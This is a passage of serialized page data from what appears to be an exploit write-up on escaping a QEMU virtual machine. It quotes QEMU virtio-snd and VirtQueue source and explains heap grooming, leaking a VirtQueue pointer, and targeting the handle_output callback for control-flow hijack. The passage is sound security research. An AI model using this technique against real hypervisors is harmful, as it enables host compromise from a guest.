rops":137187,"children":137188},{"style":314},[137189],{"type":30,"value":137190}," g_new0",{"type":24,"tag":301,"props":137192,"children":137193},{"style":359},[137194],{"type":30,"value":137195},"(V9fsFidState, ",{"type":24,"tag":301,"props":137197,"children":137198},{"style":466},[137199],{"type":30,"value":546},{"type":24,"tag":301,"props":137201,"children":137202},{"style":359},[137203],{"type":30,"value":589},{"type":24,"tag":301,"props":137205,"children":137206},{"class":303,"line":4438},[137207],{"type":24,"tag":301,"props":137208,"children":137209},{"emptyLinePlaceholder":16},[137210],{"type":30,"value":341},{"type":24,"tag":301,"props":137212,"children":137213},{"class":303,"line":4446},[137214],{"type":24,"tag":301,"props":137215,"children":137216},{"style":359},[137217],{"type":30,"value":111495},{"type":24,"tag":32,"props":137219,"children":137220},{},[137221,137223,137228],{"type":30,"value":137222},"After it is allocated, it will be placed into that freed region in place of the old ",{"type":24,"tag":145,"props":137224,"children":137226},{"className":137225},[],[137227],{"type":30,"value":136024},{"type":30,"value":135362},{"type":24,"tag":291,"props":137230,"children":137232},{"code":137231}," .value Y extended\n |\n+--------------------+--------------------+\n| |\n| |\nv v\n+--------------------+---------------+----+\n| | |....|\n| .value Y | V9fsFidState |....|\n| | |....|\n+--------------------+---------------+----+\n",[137233],{"type":24,"tag":145,"props":137234,"children":137235},{"__ignoreMap":7},[137236],{"type":30,"value":137231},{"type":24,"tag":270,"props":137238,"children":137240},{"id":137239},"leaking-a-qemu-address",[137241],{"type":30,"value":137242},"Leaking a QEMU Address",{"type":24,"tag":32,"props":137244,"children":137245},{},[137246],{"type":30,"value":137247},"We now have an arbitrary read/write primitive and a controlled chunk at a known address. The next step is to leak a QEMU code address so we can later redirect execution. To do this, we combine the arbitrary read primitive with the known-address chunk: we free that chunk, replace it with an object that contains pointers into QEMU's code or data, and then use arbitrary read to leak its fields.",{"type":24,"tag":32,"props":137249,"children":137250},{},[137251,137253,137258],{"type":30,"value":137252},"For this, we go back to virtio-snd and its buffer allocations. Recall ",{"type":24,"tag":145,"props":137254,"children":137256},{"className":137255},[],[137257],{"type":30,"value":130455},{"type":30,"value":1679},{"type":24,"tag":291,"props":137260,"children":137262},{"code":137261,"language":294,"meta":7,"className":295,"style":7},"static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n VirtIOSound *vsnd = VIRTIO_SND(vdev);\n VirtIOSoundPCMBuffer *buffer;\n VirtQueueElement *elem;\n size_t msg_sz, size;\n uint32_t stream_id;\n\n [...]\n\n for (;;) {\n VirtIOSoundPCMStream *stream;\n\n elem = virtqueue_pop(vq, sizeof(VirtQueueElement));\n if (!elem) {\n break;\n }\n /* get the message hdr object */\n msg_sz = iov_to_buf(elem->out_sg,\n elem->out_num,\n 0,\n &hdr,\n sizeof(virtio_snd_pcm_xfer));\n if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {\n goto rx_err;\n }\n stream_id = le32_to_cpu(hdr.stream_id);\n\n [...]\n\n WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n size = iov_size(elem->in_sg, elem->in_num) -\n sizeof(virtio_snd_pcm_status);\n buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size); // [1]\n buffer->elem = elem;\n buffer->vq = vq; // [2]\n buffer->size = 0;\n buffer->offset = 0;\n QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);\n }\n",[137263],{"type":24,"tag":145,"props":137264,"children":137265},{"__ignoreMap":7},[137266,137309,137316,137347,137362,137377,137389,137402,137409,137416,137423,137434,137449,137456,137484,137503,137514,137521,137529,137566,137587,137599,137612,137625,137651,137663,137670,137708,137715,137722,137729,137760,137815,137827,137868,137891,137920,137947,137974,138006],{"type":24,"tag":301,"props":137267,"children":137268},{"class":303,"line":304},[137269,137273,137277,137281,137285,137289,137293,137297,137301,137305],{"type":24,"tag":301,"props":137270,"children":137271},{"style":348},[137272],{"type":30,"value":752},{"type":24,"tag":301,"props":137274,"children":137275},{"style":348},[137276],{"type":30,"value":757},{"type":24,"tag":301,"props":137278,"children":137279},{"style":314},[137280],{"type":30,"value":130534},{"type":24,"tag":301,"props":137282,"children":137283},{"style":359},[137284],{"type":30,"value":130539},{"type":24,"tag":301,"props":137286,"children":137287},{"style":385},[137288],{"type":30,"value":772},{"type":24,"tag":301,"props":137290,"children":137291},{"style":369},[137292],{"type":30,"value":130548},{"type":24,"tag":301,"props":137294,"children":137295},{"style":359},[137296],{"type":30,"value":130553},{"type":24,"tag":301,"props":137298,"children":137299},{"style":385},[137300],{"type":30,"value":772},{"type":24,"tag":301,"props":137302,"children":137303},{"style":369},[137304],{"type":30,"value":130562},{"type":24,"tag":301,"props":137306,"children":137307},{"style":359},[137308],{"type":30,"value":791},{"type":24,"tag":301,"props":137310,"children":137311},{"class":303,"line":320},[137312],{"type":24,"tag":301,"props":137313,"children":137314},{"style":359},[137315],{"type":30,"value":799},{"type":24,"tag":301,"props":137317,"children":137318},{"class":303,"line":335},[137319,137324,137328,137333,137337,137342],{"type":24,"tag":301,"props":137320,"children":137321},{"style":359},[137322],{"type":30,"value":137323}," VirtIOSound ",{"type":24,"tag":301,"props":137325,"children":137326},{"style":385},[137327],{"type":30,"value":772},{"type":24,"tag":301,"props":137329,"children":137330},{"style":359},[137331],{"type":30,"value":137332},"vsnd ",{"type":24,"tag":301,"props":137334,"children":137335},{"style":385},[137336],{"type":30,"value":523},{"type":24,"tag":301,"props":137338,"children":137339},{"style":314},[137340],{"type":30,"value":137341}," VIRTIO_SND",{"type":24,"tag":301,"props":137343,"children":137344},{"style":359},[137345],{"type":30,"value":137346},"(vdev);\n",{"type":24,"tag":301,"props":137348,"children":137349},{"class":303,"line":344},[137350,137354,137358],{"type":24,"tag":301,"props":137351,"children":137352},{"style":359},[137353],{"type":30,"value":131549},{"type":24,"tag":301,"props":137355,"children":137356},{"style":385},[137357],{"type":30,"value":772},{"type":24,"tag":301,"props":137359,"children":137360},{"style":359},[137361],{"type":30,"value":131558},{"type":24,"tag":301,"props":137363,"children":137364},{"class":303,"line":401},[137365,137369,137373],{"type":24,"tag":301,"props":137366,"children":137367},{"style":359},[137368],{"type":30,"value":130581},{"type":24,"tag":301,"props":137370,"children":137371},{"style":385},[137372],{"type":30,"value":772},{"type":24,"tag":301,"props":137374,"children":137375},{"style":359},[137376],{"type":30,"value":130590},{"type":24,"tag":301,"props":137378,"children":137379},{"class":303,"line":415},[137380,137384],{"type":24,"tag":301,"props":137381,"children":137382},{"style":348},[137383],{"type":30,"value":3093},{"type":24,"tag":301,"props":137385,"children":137386},{"style":359},[137387],{"type":30,"value":137388}," msg_sz, size;\n",{"type":24,"tag":301,"props":137390,"children":137391},{"class":303,"line":439},[137392,137397],{"type":24,"tag":301,"props":137393,"children":137394},{"style":348},[137395],{"type":30,"value":137396}," uint32_t",{"type":24,"tag":301,"props":137398,"children":137399},{"style":359},[137400],{"type":30,"value":137401}," stream_id;\n",{"type":24,"tag":301,"props":137403,"children":137404},{"class":303,"line":447},[137405],{"type":24,"tag":301,"props":137406,"children":137407},{"emptyLinePlaceholder":16},[137408],{"type":30,"value":341},{"type":24,"tag":301,"props":137410,"children":137411},{"class":303,"line":476},[137412],{"type":24,"tag":301,"props":137413,"children":137414},{"style":359},[137415],{"type":30,"value":111495},{"type":24,"tag":301,"props":137417,"children":137418},{"class":303,"line":495},[137419],{"type":24,"tag":301,"props":137420,"children":137421},{"emptyLinePlaceholder":16},[137422],{"type":30,"value":341},{"type":24,"tag":301,"props":137424,"children":137425},{"class":303,"line":504},[137426,137430],{"type":24,"tag":301,"props":137427,"children":137428},{"style":308},[137429],{"type":30,"value":3249},{"type":24,"tag":301,"props":137431,"children":137432},{"style":359},[137433],{"type":30,"value":130616},{"type":24,"tag":301,"props":137435,"children":137436},{"class":303,"line":512},[137437,137441,137445],{"type":24,"tag":301,"props":137438,"children":137439},{"style":359},[137440],{"type":30,"value":130624},{"type":24,"tag":301,"props":137442,"children":137443},{"style":385},[137444],{"type":30,"value":772},{"type":24,"tag":301,"props":137446,"children":137447},{"style":359},[137448],{"type":30,"value":130633},{"type":24,"tag":301,"props":137450,"children":137451},{"class":303,"line":592},[137452],{"type":24,"tag":301,"props":137453,"children":137454},{"emptyLinePlaceholder":16},[137455],{"type":30,"value":341},{"type":24,"tag":301,"props":137457,"children":137458},{"class":303,"line":619},[137459,137463,137467,137471,137475,137479],{"type":24,"tag":301,"props":137460,"children":137461},{"style":359},[137462],{"type":30,"value":130648},{"type":24,"tag":301,"props":137464,"children":137465},{"style":385},[137466],{"type":30,"value":523},{"type":24,"tag":301,"props":137468,"children":137469},{"style":314},[137470],{"type":30,"value":130657},{"type":24,"tag":301,"props":137472,"children":137473},{"style":359},[137474],{"type":30,"value":130662},{"type":24,"tag":301,"props":137476,"children":137477},{"style":348},[137478],{"type":30,"value":62050},{"type":24,"tag":301,"props":137480,"children":137481},{"style":359},[137482],{"type":30,"value":137483},"(VirtQueueElement));\n",{"type":24,"tag":301,"props":137485,"children":137486},{"class":303,"line":635},[137487,137491,137495,137499],{"type":24,"tag":301,"props":137488,"children":137489},{"style":308},[137490],{"type":30,"value":3285},{"type":24,"tag":301,"props":137492,"children":137493},{"style":359},[137494],{"type":30,"value":873},{"type":24,"tag":301,"props":137496,"children":137497},{"style":385},[137498],{"type":30,"value":2485},{"type":24,"tag":301,"props":137500,"children":137501},{"style":359},[137502],{"type":30,"value":130696},{"type":24,"tag":301,"props":137504,"children":137505},{"class":303,"line":643},[137506,137510],{"type":24,"tag":301,"props":137507,"children":137508},{"style":308},[137509],{"type":30,"value":10127},{"type":24,"tag":301,"props":137511,"children":137512},{"style":359},[137513],{"type":30,"value":492},{"type":24,"tag":301,"props":137515,"children":137516},{"class":303,"line":652},[137517],{"type":24,"tag":301,"props":137518,"children":137519},{"style":359},[137520],{"type":30,"value":3345},{"type":24,"tag":301,"props":137522,"children":137523},{"class":303,"line":666},[137524],{"type":24,"tag":301,"props":137525,"children":137526},{"style":1062},[137527],{"type":30,"value":137528}," /* get the message hdr object */\n",{"type":24,"tag":301,"props":137530,"children":137531},{"class":303,"line":674},[137532,137537,137541,137546,137550,137554,137558,137562],{"type":24,"tag":301,"props":137533,"children":137534},{"style":359},[137535],{"type":30,"value":137536}," msg_sz ",{"type":24,"tag":301,"props":137538,"children":137539},{"style":385},[137540],{"type":30,"value":523},{"type":24,"tag":301,"props":137542,"children":137543},{"style":314},[137544],{"type":30,"value":137545}," iov_to_buf",{"type":24,"tag":301,"props":137547,"children":137548},{"style":359},[137549],{"type":30,"value":362},{"type":24,"tag":301,"props":137551,"children":137552},{"style":369},[137553],{"type":30,"value":58789},{"type":24,"tag":301,"props":137555,"children":137556},{"style":359},[137557],{"type":30,"value":882},{"type":24,"tag":301,"props":137559,"children":137560},{"style":369},[137561],{"type":30,"value":131098},{"type":24,"tag":301,"props":137563,"children":137564},{"style":359},[137565],{"type":30,"value":1729},{"type":24,"tag":301,"props":137567,"children":137568},{"class":303,"line":692},[137569,137574,137578,137583],{"type":24,"tag":301,"props":137570,"children":137571},{"style":369},[137572],{"type":30,"value":137573}," elem",{"type":24,"tag":301,"props":137575,"children":137576},{"style":359},[137577],{"type":30,"value":882},{"type":24,"tag":301,"props":137579,"children":137580},{"style":369},[137581],{"type":30,"value":137582},"out_num",{"type":24,"tag":301,"props":137584,"children":137585},{"style":359},[137586],{"type":30,"value":1729},{"type":24,"tag":301,"props":137588,"children":137589},{"class":303,"line":3631},[137590,137595],{"type":24,"tag":301,"props":137591,"children":137592},{"style":466},[137593],{"type":30,"value":137594}," 0",{"type":24,"tag":301,"props":137596,"children":137597},{"style":359},[137598],{"type":30,"value":1729},{"type":24,"tag":301,"props":137600,"children":137601},{"class":303,"line":3639},[137602,137607],{"type":24,"tag":301,"props":137603,"children":137604},{"style":385},[137605],{"type":30,"value":137606}," &",{"type":24,"tag":301,"props":137608,"children":137609},{"style":359},[137610],{"type":30,"value":137611},"hdr,\n",{"type":24,"tag":301,"props":137613,"children":137614},{"class":303,"line":3647},[137615,137620],{"type":24,"tag":301,"props":137616,"children":137617},{"style":348},[137618],{"type":30,"value":137619}," sizeof",{"type":24,"tag":301,"props":137621,"children":137622},{"style":359},[137623],{"type":30,"value":137624},"(virtio_snd_pcm_xfer));\n",{"type":24,"tag":301,"props":137626,"children":137627},{"class":303,"line":3685},[137628,137632,137637,137641,137646],{"type":24,"tag":301,"props":137629,"children":137630},{"style":308},[137631],{"type":30,"value":3285},{"type":24,"tag":301,"props":137633,"children":137634},{"style":359},[137635],{"type":30,"value":137636}," (msg_sz ",{"type":24,"tag":301,"props":137638,"children":137639},{"style":385},[137640],{"type":30,"value":463},{"type":24,"tag":301,"props":137642,"children":137643},{"style":348},[137644],{"type":30,"value":137645}," sizeof",{"type":24,"tag":301,"props":137647,"children":137648},{"style":359},[137649],{"type":30,"value":137650},"(virtio_snd_pcm_xfer)) {\n",{"type":24,"tag":301,"props":137652,"children":137653},{"class":303,"line":3713},[137654,137658],{"type":24,"tag":301,"props":137655,"children":137656},{"style":308},[137657],{"type":30,"value":67264},{"type":24,"tag":301,"props":137659,"children":137660},{"style":359},[137661],{"type":30,"value":137662}," rx_err;\n",{"type":24,"tag":301,"props":137664,"children":137665},{"class":303,"line":3721},[137666],{"type":24,"tag":301,"props":137667,"children":137668},{"style":359},[137669],{"type":30,"value":3345},{"type":24,"tag":301,"props":137671,"children":137672},{"class":303,"line":3751},[137673,137678,137682,137686,137690,137695,137699,137704],{"type":24,"tag":301,"props":137674,"children":137675},{"style":359},[137676],{"type":30,"value":137677}," stream_id ",{"type":24,"tag":301,"props":137679,"children":137680},{"style":385},[137681],{"type":30,"value":523},{"type":24,"tag":301,"props":137683,"children":137684},{"style":314},[137685],{"type":30,"value":132557},{"type":24,"tag":301,"props":137687,"children":137688},{"style":359},[137689],{"type":30,"value":362},{"type":24,"tag":301,"props":137691,"children":137692},{"style":369},[137693],{"type":30,"value":137694},"hdr",{"type":24,"tag":301,"props":137696,"children":137697},{"style":359},[137698],{"type":30,"value":206},{"type":24,"tag":301,"props":137700,"children":137701},{"style":369},[137702],{"type":30,"value":137703},"stream_id",{"type":24,"tag":301,"props":137705,"children":137706},{"style":359},[137707],{"type":30,"value":589},{"type":24,"tag":301,"props":137709,"children":137710},{"class":303,"line":3782},[137711],{"type":24,"tag":301,"props":137712,"children":137713},{"emptyLinePlaceholder":16},[137714],{"type":30,"value":341},{"type":24,"tag":301,"props":137716,"children":137717},{"class":303,"line":3791},[137718],{"type":24,"tag":301,"props":137719,"children":137720},{"style":359},[137721],{"type":30,"value":5858},{"type":24,"tag":301,"props":137723,"children":137724},{"class":303,"line":3819},[137725],{"type":24,"tag":301,"props":137726,"children":137727},{"emptyLinePlaceholder":16},[137728],{"type":30,"value":341},{"type":24,"tag":301,"props":137730,"children":137731},{"class":303,"line":4397},[137732,137736,137740,137744,137748,137752,137756],{"type":24,"tag":301,"props":137733,"children":137734},{"style":314},[137735],{"type":30,"value":130743},{"type":24,"tag":301,"props":137737,"children":137738},{"style":359},[137739],{"type":30,"value":362},{"type":24,"tag":301,"props":137741,"children":137742},{"style":385},[137743],{"type":30,"value":556},{"type":24,"tag":301,"props":137745,"children":137746},{"style":369},[137747],{"type":30,"value":43003},{"type":24,"tag":301,"props":137749,"children":137750},{"style":359},[137751],{"type":30,"value":882},{"type":24,"tag":301,"props":137753,"children":137754},{"style":369},[137755],{"type":30,"value":130764},{"type":24,"tag":301,"props":137757,"children":137758},{"style":359},[137759],{"type":30,"value":398},{"type":24,"tag":301,"props":137761,"children":137762},{"class":303,"line":4405},[137763,137767,137771,137775,137779,137783,137787,137791,137795,137799,137803,137807,137811],{"type":24,"tag":301,"props":137764,"children":137765},{"style":359},[137766],{"type":30,"value":130776},{"type":24,"tag":301,"props":137768,"children":137769},{"style":385},[137770],{"type":30,"value":523},{"type":24,"tag":301,"props":137772,"children":137773},{"style":314},[137774],{"type":30,"value":130785},{"type":24,"tag":301,"props":137776,"children":137777},{"style":359},[137778],{"type":30,"value":362},{"type":24,"tag":301,"props":137780,"children":137781},{"style":369},[137782],{"type":30,"value":58789},{"type":24,"tag":301,"props":137784,"children":137785},{"style":359},[137786],{"type":30,"value":882},{"type":24,"tag":301,"props":137788,"children":137789},{"style":369},[137790],{"type":30,"value":130802},{"type":24,"tag":301,"props":137792,"children":137793},{"style":359},[137794],{"type":30,"value":377},{"type":24,"tag":301,"props":137796,"children":137797},{"style":369},[137798],{"type":30,"value":58789},{"type":24,"tag":301,"props":137800,"children":137801},{"style":359},[137802],{"type":30,"value":882},{"type":24,"tag":301,"props":137804,"children":137805},{"style":369},[137806],{"type":30,"value":130819},{"type":24,"tag":301,"props":137808,"children":137809},{"style":359},[137810],{"type":30,"value":911},{"type":24,"tag":301,"props":137812,"children":137813},{"style":385},[137814],{"type":30,"value":57591},{"type":24,"tag":301,"props":137816,"children":137817},{"class":303,"line":4422},[137818,137822],{"type":24,"tag":301,"props":137819,"children":137820},{"style":348},[137821],{"type":30,"value":130835},{"type":24,"tag":301,"props":137823,"children":137824},{"style":359},[137825],{"type":30,"value":137826},"(virtio_snd_pcm_status);\n",{"type":24,"tag":301,"props":137828,"children":137829},{"class":303,"line":4438},[137830,137834,137838,137842,137846,137850,137854,137858,137863],{"type":24,"tag":301,"props":137831,"children":137832},{"style":359},[137833],{"type":30,"value":130853},{"type":24,"tag":301,"props":137835,"children":137836},{"style":385},[137837],{"type":30,"value":523},{"type":24,"tag":301,"props":137839,"children":137840},{"style":314},[137841],{"type":30,"value":130862},{"type":24,"tag":301,"props":137843,"children":137844},{"style":359},[137845],{"type":30,"value":362},{"type":24,"tag":301,"props":137847,"children":137848},{"style":348},[137849],{"type":30,"value":62050},{"type":24,"tag":301,"props":137851,"children":137852},{"style":359},[137853],{"type":30,"value":130875},{"type":24,"tag":301,"props":137855,"children":137856},{"style":385},[137857],{"type":30,"value":11206},{"type":24,"tag":301,"props":137859,"children":137860},{"style":359},[137861],{"type":30,"value":137862}," size);",{"type":24,"tag":301,"props":137864,"children":137865},{"style":1062},[137866],{"type":30,"value":137867}," // [1]\n",{"type":24,"tag":301,"props":137869,"children":137870},{"class":303,"line":4446},[137871,137875,137879,137883,137887],{"type":24,"tag":301,"props":137872,"children":137873},{"style":369},[137874],{"type":30,"value":130892},{"type":24,"tag":301,"props":137876,"children":137877},{"style":359},[137878],{"type":30,"value":882},{"type":24,"tag":301,"props":137880,"children":137881},{"style":369},[137882],{"type":30,"value":58789},{"type":24,"tag":301,"props":137884,"children":137885},{"style":385},[137886],{"type":30,"value":2537},{"type":24,"tag":301,"props":137888,"children":137889},{"style":359},[137890],{"type":30,"value":130909},{"type":24,"tag":301,"props":137892,"children":137893},{"class":303,"line":4506},[137894,137898,137902,137906,137910,137915],{"type":24,"tag":301,"props":137895,"children":137896},{"style":369},[137897],{"type":30,"value":130892},{"type":24,"tag":301,"props":137899,"children":137900},{"style":359},[137901],{"type":30,"value":882},{"type":24,"tag":301,"props":137903,"children":137904},{"style":369},[137905],{"type":30,"value":130562},{"type":24,"tag":301,"props":137907,"children":137908},{"style":385},[137909],{"type":30,"value":2537},{"type":24,"tag":301,"props":137911,"children":137912},{"style":359},[137913],{"type":30,"value":137914}," vq;",{"type":24,"tag":301,"props":137916,"children":137917},{"style":1062},[137918],{"type":30,"value":137919}," // [2]\n",{"type":24,"tag":301,"props":137921,"children":137922},{"class":303,"line":4566},[137923,137927,137931,137935,137939,137943],{"type":24,"tag":301,"props":137924,"children":137925},{"style":369},[137926],{"type":30,"value":130892},{"type":24,"tag":301,"props":137928,"children":137929},{"style":359},[137930],{"type":30,"value":882},{"type":24,"tag":301,"props":137932,"children":137933},{"style":369},[137934],{"type":30,"value":3219},{"type":24,"tag":301,"props":137936,"children":137937},{"style":385},[137938],{"type":30,"value":2537},{"type":24,"tag":301,"props":137940,"children":137941},{"style":466},[137942],{"type":30,"value":685},{"type":24,"tag":301,"props":137944,"children":137945},{"style":359},[137946],{"type":30,"value":492},{"type":24,"tag":301,"props":137948,"children":137949},{"class":303,"line":4574},[137950,137954,137958,137962,137966,137970],{"type":24,"tag":301,"props":137951,"children":137952},{"style":369},[137953],{"type":30,"value":130892},{"type":24,"tag":301,"props":137955,"children":137956},{"style":359},[137957],{"type":30,"value":882},{"type":24,"tag":301,"props":137959,"children":137960},{"style":369},[137961],{"type":30,"value":20694},{"type":24,"tag":301,"props":137963,"children":137964},{"style":385},[137965],{"type":30,"value":2537},{"type":24,"tag":301,"props":137967,"children":137968},{"style":466},[137969],{"type":30,"value":685},{"type":24,"tag":301,"props":137971,"children":137972},{"style":359},[137973],{"type":30,"value":492},{"type":24,"tag":301,"props":137975,"children":137976},{"class":303,"line":4590},[137977,137981,137985,137989,137993,137997,138001],{"type":24,"tag":301,"props":137978,"children":137979},{"style":314},[137980],{"type":30,"value":130995},{"type":24,"tag":301,"props":137982,"children":137983},{"style":359},[137984],{"type":30,"value":362},{"type":24,"tag":301,"props":137986,"children":137987},{"style":385},[137988],{"type":30,"value":556},{"type":24,"tag":301,"props":137990,"children":137991},{"style":369},[137992],{"type":30,"value":43003},{"type":24,"tag":301,"props":137994,"children":137995},{"style":359},[137996],{"type":30,"value":882},{"type":24,"tag":301,"props":137998,"children":137999},{"style":369},[138000],{"type":30,"value":131016},{"type":24,"tag":301,"props":138002,"children":138003},{"style":359},[138004],{"type":30,"value":138005},", buffer, entry);\n",{"type":24,"tag":301,"props":138007,"children":138008},{"class":303,"line":4599},[138009],{"type":24,"tag":301,"props":138010,"children":138011},{"style":359},[138012],{"type":30,"value":3345},{"type":24,"tag":32,"props":138014,"children":138015},{},[138016,138017,138022,138024,138029,138031,138036,138038,138044],{"type":30,"value":131070},{"type":24,"tag":145,"props":138018,"children":138020},{"className":138019},[],[138021],{"type":30,"value":131076},{"type":30,"value":138023},", QEMU allocates a ",{"type":24,"tag":145,"props":138025,"children":138027},{"className":138026},[],[138028],{"type":30,"value":131213},{"type":30,"value":138030}," whose size depends on the guest-provided iovec, and at ",{"type":24,"tag":145,"props":138032,"children":138034},{"className":138033},[],[138035],{"type":30,"value":131111},{"type":30,"value":138037}," it stores the ",{"type":24,"tag":145,"props":138039,"children":138041},{"className":138040},[],[138042],{"type":30,"value":138043},"VirtQueue *vq",{"type":30,"value":138045}," pointer into the buffer.",{"type":24,"tag":32,"props":138047,"children":138048},{},[138049,138050,138056],{"type":30,"value":5293},{"type":24,"tag":145,"props":138051,"children":138053},{"className":138052},[],[138054],{"type":30,"value":138055},"VirtQueue",{"type":30,"value":138057}," structure contains some useful fields:",{"type":24,"tag":291,"props":138059,"children":138061},{"code":138060,"language":294,"meta":7,"className":295,"style":7},"struct VirtQueue\n{\n [...]\n\n VirtIOHandleOutput handle_output;\n VirtIODevice *vdev;\n\n [...]\n};\n",[138062],{"type":24,"tag":145,"props":138063,"children":138064},{"__ignoreMap":7},[138065,138077,138084,138091,138098,138106,138123,138130,138137],{"type":24,"tag":301,"props":138066,"children":138067},{"class":303,"line":304},[138068,138072],{"type":24,"tag":301,"props":138069,"children":138070},{"style":348},[138071],{"type":30,"value":3010},{"type":24,"tag":301,"props":138073,"children":138074},{"style":359},[138075],{"type":30,"value":138076}," VirtQueue\n",{"type":24,"tag":301,"props":138078,"children":138079},{"class":303,"line":320},[138080],{"type":24,"tag":301,"props":138081,"children":138082},{"style":359},[138083],{"type":30,"value":799},{"type":24,"tag":301,"props":138085,"children":138086},{"class":303,"line":335},[138087],{"type":24,"tag":301,"props":138088,"children":138089},{"style":359},[138090],{"type":30,"value":111495},{"type":24,"tag":301,"props":138092,"children":138093},{"class":303,"line":344},[138094],{"type":24,"tag":301,"props":138095,"children":138096},{"emptyLinePlaceholder":16},[138097],{"type":30,"value":341},{"type":24,"tag":301,"props":138099,"children":138100},{"class":303,"line":401},[138101],{"type":24,"tag":301,"props":138102,"children":138103},{"style":359},[138104],{"type":30,"value":138105}," VirtIOHandleOutput handle_output;\n",{"type":24,"tag":301,"props":138107,"children":138108},{"class":303,"line":415},[138109,138114,138118],{"type":24,"tag":301,"props":138110,"children":138111},{"style":359},[138112],{"type":30,"value":138113}," VirtIODevice ",{"type":24,"tag":301,"props":138115,"children":138116},{"style":385},[138117],{"type":30,"value":772},{"type":24,"tag":301,"props":138119,"children":138120},{"style":359},[138121],{"type":30,"value":138122},"vdev;\n",{"type":24,"tag":301,"props":138124,"children":138125},{"class":303,"line":439},[138126],{"type":24,"tag":301,"props":138127,"children":138128},{"emptyLinePlaceholder":16},[138129],{"type":30,"value":341},{"type":24,"tag":301,"props":138131,"children":138132},{"class":303,"line":447},[138133],{"type":24,"tag":301,"props":138134,"children":138135},{"style":359},[138136],{"type":30,"value":111495},{"type":24,"tag":301,"props":138138,"children":138139},{"class":303,"line":476},[138140],{"type":24,"tag":301,"props":138141,"children":138142},{"style":359},[138143],{"type":30,"value":3118},{"type":24,"tag":32,"props":138145,"children":138146},{},[138147,138148,138154,138156,138162],{"type":30,"value":8079},{"type":24,"tag":145,"props":138149,"children":138151},{"className":138150},[],[138152],{"type":30,"value":138153},".handle_output",{"type":30,"value":138155}," field is a callback, specifically a function pointer that gets called when the virtqueue receives a notification from the guest, and ",{"type":24,"tag":145,"props":138157,"children":138159},{"className":138158},[],[138160],{"type":30,"value":138161},".vdev",{"type":30,"value":138163}," is the pointer passed to it as the first argument:",{"type":24,"tag":291,"props":138165,"children":138167},{"code":138166,"language":294,"meta":7,"className":295,"style":7},"static void virtio_queue_notify_vq(VirtQueue *vq)\n{\n if (vq->vring.desc && vq->handle_output) {\n VirtIODevice *vdev = vq->vdev;\n\n [...]\n\n vq->handle_output(vdev, vq);\n\n [...]\n }\n}\n",[138168],{"type":24,"tag":145,"props":138169,"children":138170},{"__ignoreMap":7},[138171,138204,138211,138266,138303,138310,138317,138324,138345,138352,138359,138366],{"type":24,"tag":301,"props":138172,"children":138173},{"class":303,"line":304},[138174,138178,138182,138187,138192,138196,138200],{"type":24,"tag":301,"props":138175,"children":138176},{"style":348},[138177],{"type":30,"value":752},{"type":24,"tag":301,"props":138179,"children":138180},{"style":348},[138181],{"type":30,"value":757},{"type":24,"tag":301,"props":138183,"children":138184},{"style":314},[138185],{"type":30,"value":138186}," virtio_queue_notify_vq",{"type":24,"tag":301,"props":138188,"children":138189},{"style":359},[138190],{"type":30,"value":138191},"(VirtQueue ",{"type":24,"tag":301,"props":138193,"children":138194},{"style":385},[138195],{"type":30,"value":772},{"type":24,"tag":301,"props":138197,"children":138198},{"style":369},[138199],{"type":30,"value":130562},{"type":24,"tag":301,"props":138201,"children":138202},{"style":359},[138203],{"type":30,"value":791},{"type":24,"tag":301,"props":138205,"children":138206},{"class":303,"line":320},[138207],{"type":24,"tag":301,"props":138208,"children":138209},{"style":359},[138210],{"type":30,"value":799},{"type":24,"tag":301,"props":138212,"children":138213},{"class":303,"line":335},[138214,138218,138222,138226,138230,138235,138239,138244,138248,138253,138257,138262],{"type":24,"tag":301,"props":138215,"children":138216},{"style":308},[138217],{"type":30,"value":453},{"type":24,"tag":301,"props":138219,"children":138220},{"style":359},[138221],{"type":30,"value":873},{"type":24,"tag":301,"props":138223,"children":138224},{"style":369},[138225],{"type":30,"value":130562},{"type":24,"tag":301,"props":138227,"children":138228},{"style":359},[138229],{"type":30,"value":882},{"type":24,"tag":301,"props":138231,"children":138232},{"style":369},[138233],{"type":30,"value":138234},"vring",{"type":24,"tag":301,"props":138236,"children":138237},{"style":359},[138238],{"type":30,"value":206},{"type":24,"tag":301,"props":138240,"children":138241},{"style":369},[138242],{"type":30,"value":138243},"desc",{"type":24,"tag":301,"props":138245,"children":138246},{"style":385},[138247],{"type":30,"value":20977},{"type":24,"tag":301,"props":138249,"children":138250},{"style":369},[138251],{"type":30,"value":138252}," vq",{"type":24,"tag":301,"props":138254,"children":138255},{"style":359},[138256],{"type":30,"value":882},{"type":24,"tag":301,"props":138258,"children":138259},{"style":369},[138260],{"type":30,"value":138261},"handle_output",{"type":24,"tag":301,"props":138263,"children":138264},{"style":359},[138265],{"type":30,"value":398},{"type":24,"tag":301,"props":138267,"children":138268},{"class":303,"line":344},[138269,138274,138278,138283,138287,138291,138295,138299],{"type":24,"tag":301,"props":138270,"children":138271},{"style":359},[138272],{"type":30,"value":138273}," VirtIODevice ",{"type":24,"tag":301,"props":138275,"children":138276},{"style":385},[138277],{"type":30,"value":772},{"type":24,"tag":301,"props":138279,"children":138280},{"style":359},[138281],{"type":30,"value":138282},"vdev ",{"type":24,"tag":301,"props":138284,"children":138285},{"style":385},[138286],{"type":30,"value":523},{"type":24,"tag":301,"props":138288,"children":138289},{"style":369},[138290],{"type":30,"value":138252},{"type":24,"tag":301,"props":138292,"children":138293},{"style":359},[138294],{"type":30,"value":882},{"type":24,"tag":301,"props":138296,"children":138297},{"style":369},[138298],{"type":30,"value":130548},{"type":24,"tag":301,"props":138300,"children":138301},{"style":359},[138302],{"type":30,"value":492},{"type":24,"tag":301,"props":138304,"children":138305},{"class":303,"line":401},[138306],{"type":24,"tag":301,"props":138307,"children":138308},{"emptyLinePlaceholder":16},[138309],{"type":30,"value":341},{"type":24,"tag":301,"props":138311,"children":138312},{"class":303,"line":415},[138313],{"type":24,"tag":301,"props":138314,"children":138315},{"style":359},[138316],{"type":30,"value":5858},{"type":24,"tag":301,"props":138318,"children":138319},{"class":303,"line":439},[138320],{"type":24,"tag":301,"props":138321,"children":138322},{"emptyLinePlaceholder":16},[138323],{"type":30,"value":341},{"type":24,"tag":301,"props":138325,"children":138326},{"class":303,"line":447},[138327,138332,138336,138340],{"type":24,"tag":301,"props":138328,"children":138329},{"style":369},[138330],{"type":30,"value":138331}," 